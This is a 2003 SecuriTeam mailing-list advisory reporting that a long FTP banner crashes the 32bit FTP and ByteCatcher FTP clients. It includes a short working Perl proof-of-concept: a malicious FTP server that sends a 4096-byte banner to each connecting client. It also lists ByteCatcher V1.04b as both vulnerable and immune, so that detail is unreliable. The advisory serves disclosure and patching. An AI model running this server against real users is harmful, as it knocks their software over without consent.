[NT] Banner Buffer Overflows Found in Multiple FTP Clients

From: support@securiteam.com
Date: 02/05/03

  • Next message: support@securiteam.com: "[NT] Cumulative Patch for Internet Explorer (MS03-004)" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 5 Feb 2003 20:00:05 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Banner Buffer Overflows Found in Multiple FTP Clients
    ------------------------------------------------------------------------

    SUMMARY

    A client side vulnerability in the 32-bit FTP Client and ByteCatcher FTP
    client allows remote servers to cause the client to crash by sending it a
    large banner.

    DETAILS

    Vulnerable systems:
     * 32bit FTP Client version p9.49.01
     * ByteCatcher FTP Client V1.04b
     
    Immune systems:
     * 32bit FTP version p9.50.01
     * ByteCatcher FTP Client V1.04b

    It is possible to crash the above FTP Clients by sending them a long (4096
    bytes) FTP banner.

    Exploit:
    #!/usr/bin/perl
    ######################################################
    #
    # Affected systems:
    # 32bit FTP Client version p9.49.01
    # ByteCatcher FTP Client V1.04b
    # Possible many other clients, got this problem to
    #
    # http://www.infowarfare.dk
    #
    # Dennis Rand - Matrix@infowarfare.dk
    #
    # When FTP client connects to this server they will CRASH
    # ----------------------------------------------------------
    # Disclaimer: this file is intended as proof of concept, and
    # is not intended to be used for illegal purposes. I accept
    # no responsibility for damage incurred by the use of it.
    # ----------------------------------------------------------
    #
    #
    #
    #
    #######################################################
    use IO::Socket;
    $port = "21";
    $data = "a";
    $num = "4096";
    $buf .= $data x $num;
    $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM,
    Reuse
    => 1, Listen => 2)
    or die "Couldn't create tcp-server.\n";
    while ($client = $server->accept()) {
     print "Client connected.\n";
     print "Attacking...";
     print $client "$buf";
     print "OK\n";
     close($client);
    }

    Disclosure timeline:
    04/01/2003 Found the Vulnerability.
    04/01/2003 Author notified.
    01/02/2003 Responses received
    04/02/2003 Public Disclosure.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:matrix@infowarfare.dk>
    Dennis Rand.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.